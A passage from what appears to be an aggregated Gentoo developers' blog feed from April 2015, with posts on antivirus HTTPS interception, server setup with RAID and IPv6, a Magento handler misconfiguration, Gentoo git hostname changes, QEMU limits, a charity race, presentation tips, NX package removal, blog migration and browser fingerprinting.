There's one more interesting thing: neither Kaspersky nor Avast intercepts traffic when Extended Validation (EV) certificates are used. Extended Validation certificates are the ones that show you a green bar in the address line of the browser with the company name. The reason why they do so is obvious: using the interception certificate would remove the green bar, which users might notice and find worrying. The message the Antivirus companies are sending seems clear: if you want to deliver malware from a web page, you should buy an Extended Validation certificate.

Everyone gets HTTPS interception wrong - just don't do it

So what do we make of this? A lot of software products intercept HTTPS traffic (antivirus applications, adware, parental control filters, ...); many of them promise more security, and everyone gets it wrong.

I think these technologies are a misguided approach. The problem is not that they make mistakes in implementing them; the idea is wrong from the start. Man in the Middle used to describe an attack technique. It seems strange that it has turned into something people consider a legitimate security technology. Filtering should happen on the endpoint or not at all. Browsers do a lot these days to make your HTTPS connections more secure. Please don't mess with that.

I question the value of Antivirus software in a very general sense; I think it's an approach that has fundamental problems in itself and often causes more harm than good. But at the very least these products should try not to harm other, working security mechanisms.

(You may also want to read this EFF blog post: Dear Software Vendors: Please Stop Trying to Intercept Your Customers’ Encrypted Traffic)

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
New devbox running (April 26, 2015, 16:31 UTC)

I announced in February that Excelsior, which ran the Tinderbox, was no longer at Hurricane Electric. I also said I'd start working on a new generation of Tinderbox, and to do that I need a new devbox, as the only three Gentoo systems I have at home are the laptops and my HTPC, not exactly hardware to run compilation on all the freaking time.

So after thinking of options, I decided that it was much cheaper to just rent a single dedicated server rather than a full cabinet, and after asking around I settled on Online.net, because of the price and recommendations from friends. Unfortunately they do not support Gentoo as an operating system, which makes a few things a bit more complicated. They do provide you with a rescue system, based on Ubuntu, which is enough to do the install, but not everything is easy that way either.

Luckily, most of the configuration (but not all) was stored in Puppet — so I only had to rename the hosts there, change the MAC addresses for the LAN and WAN interfaces (I use static naming of the interfaces as lan0 and wan0, which makes many other pieces of configuration much easier to deal with), change the IP addresses, and so on. Unfortunately, since I didn't originally set up that machine through Puppet, it did not carry all the information needed to replicate the system, so it required some iteration and fixing of the configuration. This also means that the next move is going to be easier.

The biggest problem has been setting up the MDRAID partitions correctly, because of GRUB2: in case you didn't know, grub2 has an automagic dependency on mdadm — if you don't install it, grub2 won't be able to install itself on a RAID device, even though it can detect it; the maintainer refused to add a USE flag for it, so you just have to know about it.

Given what can and cannot be autodetected by the kernel, I had to fight a little more than usual, then just gave up and rebuilt the two arrays (/boot and / — yes, laugh at me, but when I installed Excelsior that was the only way to get GRUB2 not to throw up) with metadata 0.90. The remaining problem was being able to tell what the boot-up errors were, as of course I have no physical access to the machine.
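
For reference, recreating an array with the old metadata format looks roughly like this (a sketch; the device names are placeholders, and this wipes the existing array contents):

# recreate the /boot mirror with 0.90 metadata so the kernel can autodetect it
mdadm --create /dev/md0 --metadata=0.90 --level=1 --raid-devices=2 /dev/sda1 /dev/sdb1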

The Online.net server I rented is a Dell box that comes with iDRAC for remote management (Dell's own take on IPMI, essentially), and Online.net allows you to connect to it through your browser, which is pretty neat — they use a pool of temporary IP addresses and only authorize your own IP address to connect to them. On the other hand, they do not change the default certificates, which means you end up with the same untrustable Dell certificate every time.

From the iDRAC console you can't do much, but you can start up the remote, JavaWS-based console, which reminded me of something. Unfortunately the JNLP file that you can download from iDRAC did not work on the Sun, Oracle or IcedTea JREs, segfaulting (no kidding) with an X.509 error log as the last output — I seriously thought the problem was with the certificates until I decided to dig deeper and found this set of entries in the JNLP file:

 <resources os="Windows" arch="x86">
   <nativelib href="https://idracip/software/avctKVMIOWin32.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLWin32.jar" download="eager"/>
 </resources>
 <resources os="Windows" arch="amd64">
   <nativelib href="https://idracip/software/avctKVMIOWin64.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLWin64.jar" download="eager"/>
 </resources>
 <resources os="Windows" arch="x86_64">
   <nativelib href="https://idracip/software/avctKVMIOWin64.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLWin64.jar" download="eager"/>
 </resources>
  <resources os="Linux" arch="x86">
    <nativelib href="https://idracip/software/avctKVMIOLinux32.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLLinux32.jar" download="eager"/>
  </resources>
  <resources os="Linux" arch="i386">
    <nativelib href="https://idracip/software/avctKVMIOLinux32.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLLinux32.jar" download="eager"/>
  </resources>
  <resources os="Linux" arch="i586">
    <nativelib href="https://idracip/software/avctKVMIOLinux32.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLLinux32.jar" download="eager"/>
  </resources>
  <resources os="Linux" arch="i686">
    <nativelib href="https://idracip/software/avctKVMIOLinux32.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLLinux32.jar" download="eager"/>
  </resources>
  <resources os="Linux" arch="amd64">
    <nativelib href="https://idracip/software/avctKVMIOLinux64.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLLinux64.jar" download="eager"/>
  </resources>
  <resources os="Linux" arch="x86_64">
    <nativelib href="https://idracip/software/avctKVMIOLinux64.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLLinux64.jar" download="eager"/>
  </resources>
  <resources os="Mac OS X" arch="x86_64">
    <nativelib href="https://idracip/software/avctKVMIOMac64.jar" download="eager"/>
   <nativelib href="https://idracip/software/avctVMAPI_DLLMac64.jar" download="eager"/>
  </resources>

Turns out if you remove everything but the Linux/x86_64 option, it does fetch the right jar and execute the right code without segfaulting. Mysteries of Java Web Start I guess.

So after finally getting the system to boot, the next step is setting up networking — as I said I used Puppet to set up the addresses and everything, so I had working IPv4 at boot, but I had to fight a little longer to get IPv6 working. Indeed IPv6 configuration with servers, virtual and dedicated alike, is very much an unsolved problem. Not because there is no solution, but mostly because there are too many solutions — essentially every single hosting provider I ever used had a different way to set up IPv6 (including none at all in one case, so the only option was a tunnel) so it takes some fiddling around to set it up correctly.

To be honest, Online.net has a better setup than OVH or Hetzner, the latter being very flaky, and a more self-service one than Hurricane, which was very flexible and easy to set up, but required me to mail them whenever I wanted to make changes. They document dibbler, as they rely on DHCPv6 with DUID for delegation — they give you a single /56 v6 net that you can then split up into subnets and delegate independently.

What DHCPv6 in this configuration does not give you is routing — which kinda makes sense, as you can use RA (Router Advertisement) for it. Unfortunately, at first I could not get it to work. Turns out that, since I use subnets for the containerized network, I had enabled IPv6 forwarding, through Puppet of course. And it turns out that Linux will ignore Router Advertisement packets when forwarding IPv6 unless you ask it nicely to — by setting accept_ra=2 as well. Yey!

Again, this is the kind of problem where finding the information took much longer than it should have; Linux does not really tell you that it's ignoring RA packets, and it is far from obvious that setting one sysctl will effectively disable another — unless you go and look for it.
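
For reference, this is roughly the knob in question (the interface name follows my wan0 naming, and the sysctl.d file name is just an example):

# accept Router Advertisements on the upstream interface even with forwarding enabled
sysctl net.ipv6.conf.wan0.accept_ra=2
# make it persistent across reboots
echo 'net.ipv6.conf.wan0.accept_ra = 2' > /etc/sysctl.d/99-ipv6-ra.conf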

Luckily this was the last problem I had; after that the server was set up fine and I just had to finish configuring the domain's zone file, the reverse DNS and the SPF records… yes, this is all the kind of trouble you go through if you don't just have someone else run your whole infrastructure, or go fully cloud — which is why I don't consider self-hosting a general solution.

What remained was just bits and pieces. The first was realizing that Puppet does not remove entries from /etc/fstab by default, so the Gentoo default /etc/fstab file still contained the entries for CD-ROM drives as well as /dev/fd0. I don't remember which was the last computer I used, let alone owned, that had a floppy disk drive.

The other fun bit has been setting up the containers themselves — like the server itself, they are set up with Puppet. Since the old server ran a tinderbox, it also hosted a proper rsync mirror, which was just easier, but I didn't want to repeat that here; and since I was unable to find a good mirror through mirrorselect (longer story), I configured Puppet to simply give all the containers distfiles.gentoo.org as their sync server, which did not work. Turns out that our default mirror address does not have any IPv6 hosts behind it – when I asked Robin about it, it seems we just don't have any IPv6-capable mirror that can handle that traffic, which is sad.

So anyway, I now have a new devbox and I'm trying to set up the rest of my repositories and access (I have not set up access to Gentoo's repositories yet which is kind of the point here.) Hopefully this will also lead to more technical blogging in the next few weeks as I'm cutting down on the overwork to relax a bit.

Sebastian Pipping a.k.a. sping (homepage, bugs)

I ran into an example of a web application vulnerable to Apache AddHandler/AddType misconfiguration by chance today.

The release notes of Magento Community Edition 1.9.1 point to a remote code execution vulnerability.
Interestingly, what the section Determining Your Vulnerability to the File System Attack boils down to is precisely a switch from AddHandler to SetHandler.

Fantastic! Let’s see if I can use that to convince web hoster X, who is still arguing that using AddHandler is good enough.
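
For context, the difference boils down to something like the following sketch (the config path is a placeholder and the exact handler name depends on how PHP is hooked into Apache):

# append a safer PHP handler configuration to the vhost
cat >> /etc/apache2/vhosts.d/example.conf <<'EOF'
# Only act on files whose final extension is .php;
# AddHandler would also execute an upload named shell.php.png as PHP
<FilesMatch "\.php$">
    SetHandler application/x-httpd-php
</FilesMatch>
EOF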

PS: Before anyone takes this as advice to switch to vanilla 1.9.1.0, be sure to also apply the easy-to-overlook post-release patch “SUPEE-5344”. Details are up at (German) Magento-Shops stehen Angreifern offen or (English) Analyzing the Magento Vulnerability.

April 25, 2015
Git changes & impact to Overlays hostnames (April 25, 2015, 00:00 UTC)

As previously announced [1] [2], and previously in the discussion of merging Overlays with Gentoo’s primary SCM hosting (CVS+Git): The old overlays hostnames (git.overlays.gentoo.org and overlays.gentoo.org) have now been disabled, as well as non-SSH traffic to git.gentoo.org. This was a deliberate move to separate anonymous from authenticated Git traffic, and to ensure that anonymous Git traffic can continue to be scaled when we go ahead with switching away from CVS. Anonymous and authenticated Git are now served by separate systems, and no anonymous Git traffic is permitted to the authenticated Git server.

If you have anonymous Git checkouts from any of the affected hostnames, you should switch them to using one of these new URLs:

  • https://anongit.gentoo.org/git/$REPO
  • http://anongit.gentoo.org/git/$REPO
  • git://anongit.gentoo.org/$REPO

If you have authenticated Git checkouts from the same hosts, you should switch them to this new URL:

  • git+ssh://git@git.gentoo.org/$REPO

In either case, you can trivially update any existing checkout with:
git remote set-url origin git+ssh://git@git.gentoo.org/$REPO
(be sure to adjust the path of the repository and the name of the remote as needed).

April 23, 2015
Denis Dupeyron a.k.a. calchan (homepage, bugs)

is 46.

In a previous post I described how to patch QEMU to allow building binutils in a cross chroot. In that post I increased the maximum number of argument pages to 64 because I was just after a quick fix. Today I finally bisected it, and the result is that MAX_ARG_PAGES needs to be at least 46 for binutils to build.

Bug 533882 discusses that LibreOffice requires an even larger number of pages, and it is possible that other packages also need such a large limit. Note that it may not be a good idea to increase the MAX_ARG_PAGES limit to an absurdly high number and leave it at that: a large amount of memory will be allocated in the target’s memory space, and that may be a problem.
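
If you want to carry such a bump yourself, it is a one-line change in the QEMU sources before building; a sketch, assuming the define still lives in linux-user/qemu.h (adjust the path for your QEMU version):

# raise the argument-page limit used by the linux-user emulation
sed -i 's/^#define MAX_ARG_PAGES.*/#define MAX_ARG_PAGES 46/' linux-user/qemu.h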

Hopefully QEMU switches to a dynamic limit someday like the kernel. In the meantime, my upcoming crossroot tool will offer a way to more easily deal with that.

April 21, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

The weekend of Saturday, April 11, my best friend and I made the drive down to Huntsville, Alabama to participate in the 2015 Superheroes Race benefiting the outstanding organisation that is The National Children’s Advocacy Center. It was a bit of a drive, but almost completely motorway, so it wasn’t that bad. Before talking about the main event (the race itself), I have to mention some of the way cool things that we did beforehand.


NASA US Space and Rocket Center in Huntsville, AL
(click to enlarge)

Firstly, we went to the US Space and Rocket Center, which is essentially the visitor’s centre for NASA. In my opinion, the price of admission was a little high, but the exhibits made it completely worth it. Some of the highlights were the Robot Zoo and the amazing showroom of the Saturn V rocket.


Robot grasshopper at US Space and Rocket Center Robot Zoo   Saturn V rocket at US Space and Rocket Center
(click to enlarge)

Secondly, we had some great food at two very different types of restaurants. The first place was for a quick lunch at a Mexican place called Taqueria El Cazador #2, which is housed inside of a bus. We both had the tacos, which were excellent. I also grabbed some tamales, but they didn’t impress me nearly as much as the tacos. Overall, though, a great place that is cheap and tasty! The place that we went for dinner was Phuket Thai Restaurant, and even though it wasn’t in a bus, it was outstanding! Having been to Thailand, I was a little suspicious of the reviewers saying that it was one of the best places for Thai in the US. Having not eaten at all the Thai places in the US, I can’t say so definitively, but it was great! In particular, the Khao Soi was deliciously creamy, and putting the remaining sauce on some extra rice almost made for another meal in and of itself!

Thirdly, we went to the National Children’s Advocacy Center (NCAC) to see what needed to be done to prepare for the race the next day. I have been a supporter of the organisation for quite some time (you can see more about them via their link in the “Charities I Support” menu at the top of the blog), but I had never seen the facilities. I was stunned at the size of the complex, and even more taken aback at the people who work for the NCAC! They were absolutely outstanding, and after having seen the facilities, I feel even more strongly aligned with their mission statement of “modelling, promoting, and delivering excellence in child abuse response and prevention through service, education, and leadership.”


National Children's Advocacy Center NCAC sign   National Children's Advocacy Center NCAC community services building
(click to enlarge)

Fourthly, we just happened to stumble upon this really neat place known as Lowe Mill, and they were having an art show and free concert. There were various artists ranging from painters, photographers, and musicians, as well as plenty of bakers and confectioners serving up their yummy treats (like a decadent lemon cupcake with cream cheese frosting [I won't say who ate that one...]).

Okay, so now let’s get to the actual reason that I went to Huntsville: to support the NCAC in the 2015 Superheroes Race! There were three options for runners: 1) the timed and competitive 5K; 2) the timed and competitive 1-mile; 3) the 1-mile fun-run for kids (and adults too!). I participated in the 5K, and actually ended up coming in first place. My time wasn’t as good as I would have liked, but the course was a lot of fun! It went winding through the city centre and some very nice suburban areas as well (both starting and ending at the NCAC). There were also awards given out for the costumes (best individual costume, best family costumes, et cetera). I went as The Flash, but dang, it’s difficult to run in a full costume, so I applaud those people that did it! The Chief of Police actually ran in the race, and did so in uniform (belt and all)–now that’s supporting the community!


National Children's Advocacy Center NCAC kids' costumes   National Children's Advocacy Center NCAC family costumes
(click to enlarge)

One of the highlights of the whole trip was getting to meet some of the wonderful people that make the NCAC happen. I was fortunate enough to meet Catherine Courtney (the Director of Development) and Caroline Nelson (the Development Campaign Coordinator) (both pictured below), as well as Chris Newlin (the Executive Director). These three individuals are not only a few of the folks that help the NCAC function on a day-to-day basis, but they are truly inspirational people who have huge hearts for helping the children to whom the NCAC provides services–their passion to help kids is nearly tangible!


National Children's Advocacy Center NCAC Catherine Courtney and Zach   National Children's Advocacy Center NCAC Caroline Nelson and Zach
LEFT: The Flash (AKA me) and Catherine Courtney        RIGHT: Caroline Nelson
(click to enlarge)

Overall, the trip to Huntsville was both pleasant and productive. I hope that I will be able to participate in the races in the future, and that I will be able to work with the NCAC for years and years to come. If you agree with their Mission Statement, I urge you to become a member of the Protectors’ Circle and support the incredibly important work that they do.

Cheers,
Zach

Donnie Berkholz a.k.a. dberkholz (homepage, bugs)
How to give a great talk, the lazy way (April 21, 2015, 15:42 UTC)

presenter mode

Got a talk coming up? Want it to go well? Here are some starting points.

I give a lot of talks. Often I’m paid to give them, and I regularly get very high ratings or even awards. But every time I listen to people speaking in public for the first time, or maybe the first few times, I think of some very easy ways for them to vastly improve their talks.

Here, I wanted to share my top tips to make your life (and, selfishly, my life watching your talks) much better:

  1. Presenter mode is the greatest invention ever. Use it. If you ignore or forget everything else in this post, remember the rainbows and unicorns of presenter mode. This magical invention keeps the current slide showing on the projector while your laptop shows something different — the current slide, a small image of the next slide, and your slide notes. The last bit is the key. What I put on my notes is the main points of the current slide, followed by my transition to the next slide. Presentations look a lot more natural when you say the transition before you move to the next slide rather than after. More than anything else, presenter mode dramatically cut down on my prep time, because suddenly I no longer had to rehearse. I had seamless, invisible crib notes while I was up on stage.
  2. Plan your intro. Starting strong goes a long way, as it turns out that making a good first impression actually matters. It’s time very well spent to literally script your first few sentences. It helps you get the flow going and get comfortable, so you can really focus on what you’re saying instead of how nervous you are. Avoid jokes unless most of your friends think you’re funny almost all the time. (Hint: they don’t, and you aren’t.)
  3. No bullet points. Ever. (Unless you’re an expert, and you probably aren’t.) We’ve been trained by too many years of boring, sleep-inducing PowerPoint presentations that bullet points equal naptime. Remember presenter mode? Put the bullet points in the slide notes that only you see. If for some reason you think you’re the sole exception to this, at a minimum use visual advances/transitions. (And the only good transition is an instant appear. None of that fading crap.) That makes each point appear on-demand rather than all of them showing up at once.
  4. Avoid text-filled slides. When you put a bunch of text in slides, people inevitably read it. And they read it at a different pace than you’re reading it. Because you probably are reading it, which is incredibly boring to listen to. The two different paces mean they can’t really focus on either the words on the slide or the words coming out of your mouth, and your attendees consequently leave having learned less than either of those options alone would’ve left them with.
  5. Use lots of really large images. Each slide should be a single concept with very little text, and images are a good way to force yourself to do so. Unless there’s a very good reason, your images should be full-bleed. That means they go past the edges of the slide on all sides. My favorite place to find images is a Flickr advanced search for Creative Commons licenses. Google also has this capability within Search Tools. Sometimes images are code samples, and that’s fine as long as you remember to illustrate only one concept — highlight the important part.
  6. Look natural. Get out from behind the podium, so you don’t look like a statue or give the classic podium death-grip (one hand on each side). You’ll want to pick up a wireless slide advancer and make sure you have a wireless lavalier mic, so you can wander around the stage. Remember to work your way back regularly to check on your slide notes, unless you’re fortunate enough to have them on extra monitors around the stage. Talk to a few people in the audience beforehand, if possible, to get yourself comfortable and get a few anecdotes of why people are there and what their background is.
  7. Don’t go over time. You can go under, even a lot under, and that’s OK. One of the best talks I ever gave took 22 minutes of a 45-minute slot, and the rest filled up with Q&A. Nobody’s going to mind at all if you use up 30 minutes of that slot, but cutting into their bathroom or coffee break, on the other hand, is incredibly disrespectful to every attendee. This is what watches, and the timer in presenter mode, and clocks, are for. If you don’t have any of those, ask a friend or make a new friend in the front row.
  8. You’re the centerpiece. The slides are a prop. If people are always looking at the slides rather than you, chances are you’ve made a mistake. Remember, the focus should be on you, the speaker. If they’re only watching the slides, why didn’t you just post a link to Slideshare or Speakerdeck and call it a day?

I’ve given enough talks that I have a good feel on how long my slides will take, and I’m able to adjust on the fly. But if you aren’t sure of that, it might make sense to rehearse. I generally don’t rehearse, because after all, this is the lazy way.

If you can manage to do those 8 things, you’ve already come a long way. Good luck!


Tagged: communication, gentoo

April 19, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

To be honest, I am irritated that this stupid idea has come up yet again.

Please co-sign

https://www.change.org/p/heiko-maas-bundesregierung-stoppen-sie-die-vorratsdatenspeicherung-vds

and spread the word. Thanks!

April 16, 2015
Bernard Cafarelli a.k.a. voyageur (homepage, bugs)
Removing old NX packages from tree (April 16, 2015, 21:30 UTC)

I already sent the last rites announcement a few days ago, but here is a more detailed post on the upcoming removal of the “old” NX packages. Long story short: migrate to X2Go if possible, or use the NX overlay (“best-effort” support provided).
2015/04/26 note: treecleaning done!

Affected packages

Basically, all NX clients and servers except x2go and nxplayer! Here is the complete list with some specific last rites reasons:

  • net-misc/nxclient, net-misc/nxnode, net-misc/nxserver-freeedition: the binary-only original NX client and server. Upstream has moved on to a closed-source technology, and this version bundles potentially vulnerable binary code. It also does not work as well as it used to with current libraries (like Cairo).
  • net-misc/nxserver-freenx, net-misc/nxsadmin: the first open-source alternative server. It could be tricky to get working, and is not updated anymore (last upstream activity around 2009)
  • net-misc/nxcl, net-misc/qtnx: an open-source alternative client (last upstream activity around 2008)
  • net-misc/neatx: Google’s take on a NX server, sadly it never took off (last upstream activity around 2010)
  • app-admin/eselect-nxserver (an eselect module to switch active NX server, useless without these servers in tree)

Continue using these packages on Gentoo

These packages will be dropped from the main tree by the end of this month (2015/04), and then only available in the NX overlay. They will still be supported there in a “best effort” way (no guarantee how long some of these packages will work with current systems).

So, if one of these packages still works better for you, or you need to keep them around before migrating, just run:

# layman -a nx

Alternatives

While it is not a direct drop-in replacement, x2go is the most complete solution currently in the Gentoo tree (and my recommendation), with a lot of possible advanced features, active upstream development, … You can connect to net-misc/x2goserver with net-misc/x2goclient, net-misc/pyhoca-gui, or net-misc/pyhoca-cli.
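
Installation is the usual emerge away; a minimal sketch (pick whichever client you prefer):

# server side
emerge --ask net-misc/x2goserver
# client side (net-misc/pyhoca-gui or net-misc/pyhoca-cli work as well)
emerge --ask net-misc/x2goclient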

If you want to try the new system from NoMachine (the company that created NX), the client is available in Portage as net-misc/nxplayer. The server itself is not packaged yet; if you are interested in it, see bug #488334.

April 13, 2015
Bernard Cafarelli a.k.a. voyageur (homepage, bugs)

This blog had been hosted on GandiBlog since mid-2006. Thanks to the Gandi folks, it served me well, though it was starting to show its age.

Now I intend to revive this blog, and the first step was to finally move it onto my own server, switching to WordPress in the process! The rest of this post details how I did the switch while keeping the blog content and links.

GandiBlog to self-hosted Dotclear2

GandiBlog’s only export possibility is a flat text file export (Extensions->Import/Export). An old WordPress plugin exists to import such files, and it is likely the solution you will first find in your favourite search engine. But its last update was years ago and it does not seem to work with current versions. Instead, I chose to set up a temporary DotClear2 installation on my server, so I could use the current DotClear import plugin in WordPress later.

Installing DotClear is as easy as creating a MySQL user and database, unpacking the latest 2.x tarball, and following the installation wizard. No need to tweak configuration or users here; I just logged into the administration panel, imported the GandiBlog flat file, and I was (mostly) done!
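
The database part looks roughly like this (database name, user and password are placeholders):

# create a throwaway database and user for the temporary DotClear2 install
mysql -u root -p -e "CREATE DATABASE dotclear_tmp CHARACTER SET utf8;
  CREATE USER 'dotclear'@'localhost' IDENTIFIED BY 'changeme';
  GRANT ALL PRIVILEGES ON dotclear_tmp.* TO 'dotclear'@'localhost';
  FLUSH PRIVILEGES;"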

I say mostly, because I fixed 2 things before the WordPress jump. You may not need to do the same, but here they are:

  • Some blog posts were in wiki style rather than XHTML, and were not converted correctly. As there were only a few of them, I used the “Convert to XML” button available when editing a post. I think tools exist for a mass conversion.
  • Some other posts were in the “Uncategorized” category and were ignored by the import process. My manual workaround was to move them to an “Other” category I created for the occasion. Again, this can be automated.

Dotclear2 to WordPress4

The next step was to set up a new vhost on my server, emerge the latest wordpress and install it in this new vhost (no special steps here).

Once WordPress was basically up and running, I installed the “DotClear2 Importer” plugin and ran it (it is an additional entry in Tools/Import). Basically it boiled down to filling in the (DotClear) database connection details and hitting the next button a few times.

Some additional steps to clean the new blog posts:

  • configure the permalink settings to use “Month and name”. This, along with the “Permalink Finder” plugin, allowed me to preserve old links to the blog posts (the plugin deduces the new post URL and redirects to it)
  • delete the user created by the import, moving all posts to the new user in WordPress (this is a single-user blog)
  • move back the “Other” category posts to “Uncategorized”
  • temporarily install “Broken Link Checker” plugin to fix some old/dead links. Some comments had an additional “http://” prefix in URLs, and I fixed them along with updating other real links
  • remove temporary parts (dotclear install and database, cleanup/import plugins, …)
  • And when everything looked good, I could update my DNS entries to the blog :)

April 12, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

So Sebastian posted recently about Panopticlick, but I'm afraid he has not grasped just how many subtleties are present when dealing with tracking by User-Agent and with the limitations of the tool as it is.

First of all, let's take a moment to realize what «Your browser fingerprint appears to be unique among the 5,207,918 tested so far.» (emphasis mine) means. If I try the exact same request in Incognito, the message is «Within our dataset of several million visitors, only one in 2,603,994 browsers have the same fingerprint as yours.» (emphasis mine). I'm not sure why the EFF does not expose the numbers in the second situation, hiding the five million under the word "several". I can't tell how they identify further requests on the same browser as not being a new hit altogether. So I'm not sure what the number represents.

Understanding what the number represents is a major problem, too: consider that even just for his post Sebastian tried at least three browsers, and I tried twice just to write this one — so one thing the number does not count is unique users. I would venture a guess that the number of users is well below a million, and that comes into play in multiple ways: Panopticlick was born in 2010, and if fewer than a million real users have hit it in five years, it might not be that statistically relevant.

Indeed, according to the current reading, just the Accept headers would be enough to boil me down to one in four sessions — that would be encoding and language. I doubt that is so clear-cut, as I'm most definitely not one of four people in the UKIE area speaking Italian. A lot of this has to do with the self-selection of "privacy conscious" people who use this tool from EFF.

But what worries me is the reaction from Sebastian and, even more so, the first comment on his post. Suggesting that you can hide in the crowd by looking for a "more popular" User-Agent, or by using a random bunch of extensions and disabling JavaScript or blocking certain domains, is naïve to say the least, and most likely misses and misunderstands the point that Panopticlick tries to make.

The whole idea of browser fingerprinting is the ability to identify a user across a set of sessions — it responds to a similar threat model as Tor. While I already pointed out that I disagree with the threat model, I would like to point out again that the kind of "surveillance" this counters is ideally the one executed by an external entity able to monitor your communications across different source connections — if you don't use Tor and you only use a desktop PC from the same connection, then it doesn't really matter: you can just check for the IP address! And if you use different devices, then it also does not really matter, because you're now using different profiles anyway; the power is in the correlation.

In particular, when trying to tweak the User-Agent or other headers to make them "more common", you're now dealing with something that is more likely to backfire than not; as my ModSecurity Ruleset shows very well, it's not so difficult to tell a real Chrome request apart from Firefox masquerading as Chrome, or IE masquerading as Safari: they have different Accept-Encoding values and other differences in the style of request headers, making it quite straightforward to check for them. And while you could mix up the Accept headers enough to "look the part", it's more than likely that you'll be served bad data (e.g. sdch to IE, or webp to Firefox), and that would make your browsing useless.

More importantly, the then-unique combination of, say, a Chrome User-Agent on an obviously IE-generated request would make it very easy to follow a session aggregated across different websites with a similar fingerprint. The answer I got from Sebastian is not good either: even if you tried to use a "more common" version string, you could still very easily create unwanted unique fingerprints. Take Firefox 37: it started supporting the alt-svc extension to use HTTP/2 when available; if you reported your browser as Firefox 28 and it then followed alt-svc, it would clearly be a fake version string, and again an easy one to follow. Similar version-dependent request fingerprinting, paired with a modified User-Agent string, would make you light up like a Christmas tree on Earth Day.

There are more problems, though; the suggestion of installing extensions such as AdBlock also adds to the fingerprint rather than subtracting from it: as long as JavaScript is allowed to run, it can detect AdBlock's presence, and with a bit of work you can also identify which of the different blocking lists is in use. You could use NoScript to avoid running JavaScript at all, but given that this is by far not something most users do, it also adds to the entropy of your browser's fingerprint rather than removing from it, even if it prevents client-side fingerprinting from accessing things like the list of available plugins (which in my case is not that common, either!)

But even ignoring the fact that Panopticlick does not try to identify the set of installed extensions (finding Chrome's Readability is trivial, as it injects content into the DOM, and so do a lot more), there is one more aspect that it almost entirely ignores: server-side fingerprinting. Besides not trying to correlate the purported User-Agent against the request fingerprint, it does not seem to use a custom server at all, so it does not leverage TLS handshake fingerprints! As can be seen through Qualys analysis, there are some almost-unique handshake sequences on a given server depending on the client used; while this does not add much more data when matched against a vanilla User-Agent, a faked User-Agent and a somewhat rarer TLS handshake would be just as easy to track.

Finally, there is the problem of self-selection: Sebastian blogged about this while using Firefox 37.0.1, which had just been released, and tested with that; I assume he also had the latest Chrome. While Mozilla has increased Firefox's release cadence, Chrome definitely has a very hectic one, with many people updating all the time. Most people wouldn't go to Panopticlick every time they update their browser, so two entries that are exactly the same apart from the User-Agent version are reported as unique… even though it's most likely that the person who tried two months ago has updated since, and now has the same fingerprint as the person who tried recently with the same browser and settings.

Now this is a double-edged sword: if you rely on the User-Agent to track someone across connections, an ephemeral User-Agent that changes every other day due to updates is going to disrupt your plans quickly; on the other hand, lagging behind or jumping ahead on the update train for a browser would make it more likely for you to have a quite unique version number, even more so if you're tracking beta or developer channels.

Interestingly, though, Mozilla has thought about this before, and their Gecko user agent string reference shows which restricted fields are used, and references the bugs that disallowed extensions and various software from injecting into the User-Agent string — funnily enough, I know of quite a few badware cases in which a unique identifier was injected into the User-Agent so that fake ads and other similar websites could recognize a "referral".

Indeed, especially on mobile, I think that User-Agents are a bit too liberal with the information they push; not only do they include the full build number of the mobile browser such as Chrome, but they usually include the model of the device and the build number of the operating system: do you want to figure out if a new build of Android is available for some random device out there? Make sure you have access to HTTP logs for big enough websites and look for new build IDs. I think that in this particular sub-topic, Chrome and Safari could help a lot more by reducing the amount of detail about the engine version as well as the underlying operating system.

So, for my parting words, I would like to point out that Panopticlick is a nice proof-of-concept that shows how powerful browser fingerprinting is, without having to rely on tracking cookies. I think lots of people both underestimate the power of fingerprinting and overestimate the threat. From one side, because Panopticlick does not have enough current data to make it feasible to evaluate the current uniqueness of a session across the world; from the other, because you get the wrong impression that if Panopticlick can't put you down as unique, you're safe — you're not, there are many more techniques that Panopticlick does not think of trying!

My personal advice is to stop worrying about the NSA and instead start looking after your own safety: using click-to-play for Flash and Java is good prophylaxis for security, not just privacy, and NoScript can be useful too, in some cases, but don't just kill everything on sight. Even using the Data Saver extension for non-HTTPS websites can help (unfortunately I know of more than a few sites blocking it, and then there is the problem of captive portals forcing it back to clear-text HTTP, too.)

April 11, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Firefox: You may want to update to 37.0.1 (April 11, 2015, 19:23 UTC)

I was pointed to this Mozilla Security Advisory:

Certificate verification bypass through the HTTP/2 Alt-Svc header
https://www.mozilla.org/en-US/security/advisories/mfsa2015-44/

While it doesn’t say if all versions prior to 37.0.1 are affected, it does say that sending a certain server response header disabled warnings of invalid SSL certificates for that domain. Ooops.

I’m not sure how relevant HTTP/2 is by now.

Paweł Hajdan, Jr. a.k.a. phajdan.jr (homepage, bugs)

Slot conflicts can be annoying. It's worse when an attempt to fix them leads to an even bigger mess. I hope this post helps you with some cases - and that portage will keep getting smarter about resolving them automatically.

Read more »

Sebastian Pipping a.k.a. sping (homepage, bugs)

A document that I was privileged to access pre-release snapshots of has now been published:

Introduction to Chinese Chess (XiangQi) for International Chess Players
A Comparison of Chess and XiangQi
By xq_info (add) gmx.de (a bit shy about his real name)
98 pages

You may like the self-assessment puzzles aspect of it, but not only that. Recommended!

It’s up here:

http://wxf.ca/wxf/doc/book/xiangqi_introduction_chessplayers_20150323.pdf

Best, Sebastian

While https://panopticlick.eff.org/ is not really new, I learned about that site only recently.
And while I knew that browser self-identification would reduce my anonymity on the Internet, I didn’t expect this result:

Your browser fingerprint appears to be unique among the 5,198,585 tested so far.

Wow. Why? Let’s try one of the other browsers I use. “Appears to be unique”, again (where Flash is enabled).

What’s so unique about my setup? The two reports say about my setup:

Characteristic                  One in x browsers have this value
                                Firefox 36.0.1    Google Chrome 42.0.2311.68    Chromium 41.0.2272.76
User Agent                      2,030.70          472,599.36                    16,576.56
HTTP_ACCEPT Headers             12.66             5,477.97                      5,477.97
